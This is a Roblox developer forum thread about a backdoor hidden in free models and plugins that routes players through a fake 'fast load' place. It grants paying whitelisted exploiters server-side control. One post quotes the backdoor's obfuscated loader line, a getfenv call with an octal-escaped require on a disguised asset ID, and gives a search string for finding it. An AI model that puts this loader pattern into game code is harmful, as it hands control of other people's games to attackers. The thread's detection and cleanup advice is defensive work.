A backdoor disguised as a "fast load" place

It’s now removed, wow!

Lol it barely affected him, he just made a new one in like a minute you guys are wasting your time,
if you really want to end a backdoor you have to find its source. (which is hard even for experienced people) but yeah, he can always replace a loading game so it doesn’t matter if it gets deleted.
If you wanna find any backdoor’s source you have to crack it because they are obfuscated 99% of the time.


The idiot who made the “fast load” place uploaded the backdoor on his main account and got all his alternative accounts and his main account terminated.

Thanks, Roblox, for finally doing something good for us for once.

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Interesting, I remember finding this guys profile earlier when somebody made a map for my game and accidentally loaded it with viruses. I managed to de-obfuscate and find the source of his module, but the source was even more insanely obfuscated so I pretty much stopped there.

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There are many people with this copy of game. Also even if it’s deleted people keep playing the game.

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I found it once again, this guy is good. So in this case I found it where he does

getfenv()[‘\114\101\113\117\105\114\101’] (2422875198*2)

If you multiply that number “2422875198” by 2 you get an asset ID called “op”. I got this script at it says

– hint: require=print
– Builderman tag 7324

So you can also tie that back to the person named “Builderman”. I also found Builderman’s main account here is the profile link:

Link to Buildermans Main Account

Another also person that I have tied to this virus is
Link to another user

I think they use the group
to give their “clients” their server-sided Gui.

They also use this group to give them an advanced serverside you can see this in the role called “whitelisted ig” Secondary Group

So a solution to this, you can do

Cntrl + Shift + F and search for getfenv()‘\114\101\113\117\105\114\101’



judging by the fact his discord tag is in his status hes pretty blatant about it. good job sherlock.


Well boys, we did it, the game is no more.

these games will always be around the only way it can be stopped is by roblox giving them an ip ban or an hwid ban which i doubt will happen any time soon unless it gets really out of hand

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  • How do they do it?
  • Why do they do it?
  • Is there a way to patch these exploits?

A backdoor script is hidden in a free model or inserted by a plugin. When the game runs the script teleports players to the ‘loading’ place. When a player joins a game through TeleportService it includes data about the server they came from. The loading place sends the player back and logs the place ID. That way they can build a database of games that have the backdoor so hackers can visit later and try it.

People buy access to the exploit with real money on a third-party site (in this case in a Discord server). They get whitelisted by joining a private group or friending a throwaway account. When whitelisted players play an infected game they are given the exploit abilities through the backdoor script, allowing them server-sided power in the game.

Making sure your place is completely clean of these malicious scripts will keep server-sided exploiters out for good. Adding an “anti-exploit” script will do nothing, as it won’t change the fact that malicious code is being run in your game. They have to be removed completely. As long as you are certain there are no scripts in your game, and you manually inspect any free models you insert, and you verify the publishers of any plugins that you use, you should be safe.


I frankly don’t feel any sorrow for people who end up infected. It’s like a computer virus, they try to cheat something, they get a virus instead of what they want. Same principal applies here. Since these are free modules of things that people want, they’ll add it without question and then boom, infected. They try to get something that usually they have to pay/make on their own, but then find something that’s “free and safe” and then add it without going through the scripts of it to see if it’s bad or not. I barely used free modules before and when I do, I check to see if it’s harmful or not. Most people who get these viruses in their games most likely wanted to get something for free that you would have to pay for, came across that, and then added it. People have to learn things, whether the easy way or not, and I see this is a great way of people to grow and not try to steal other people’s work. If I’m being harsh, I’m sorry, but I just hate it how people are like ‘OMG SOMETHING IS HAPPENING IN MY GAME HELP PLS’ when THEY added the virus and THEY, most likely, wanted to get something free instead of paid. How would adding free modules that aren’t harmful tell them to learn on their own? I see this as a wake up call for people to make stuff on their own or don’t try to cheat the system and try to get something for free when you need to pay for it.


He knows roblox vulns and abuses them, his main module crashes your studio when you try to open it.

Using free models isn’t the only way of getting infected. There are plugins, which most likely happen to me.

he could make some money if he reported them to roblox i have seen people get around 1.5k from roblox for reporting a big bug


But why just get the discord server banned or so?

Ik, though this virus/backdoor is mostly modules, I think.

I think this was apart of backdoor image

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People are using it also to get exploiters to access your game… Fix the free model page…